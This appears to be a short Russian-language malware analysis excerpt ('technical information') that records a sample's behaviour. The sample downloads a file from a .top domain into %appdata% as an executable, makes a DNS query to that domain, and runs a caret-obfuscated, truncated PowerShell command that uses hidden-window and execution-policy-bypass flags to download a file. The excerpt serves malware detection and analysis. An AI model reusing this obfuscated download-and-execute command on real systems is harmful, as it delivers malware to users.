Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWE^Rs^he^lL.Ex^E -ex^ecutIOnP^OLiCY^ ^b^YPas^s^ -^n^OPR^Of^i^LE^ -WINdOWST^y^lE h^IdDen (Ne^W^-^ob^jeCT^ SysTEM.^N^e^t^.We^BC^L^IE^NT^)^.DO^wNloA^Df^ILE^('http://toagoores.t...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /C "poWE^Rs^he^lL.Ex^E -ex^ecutIOnP^OLiCY^ ^b^YPas^s^ -^n^OPR^Of^i^LE^ -WINdOWST^y^lE h^IdDen (Ne^W^-^ob^jeCT^ SysTEM.^N^e^t^.We^BC^L^IE^NT^)^.DO^wNloA^Df^ILE^('http://toagoores.t...' (со скрытым окном)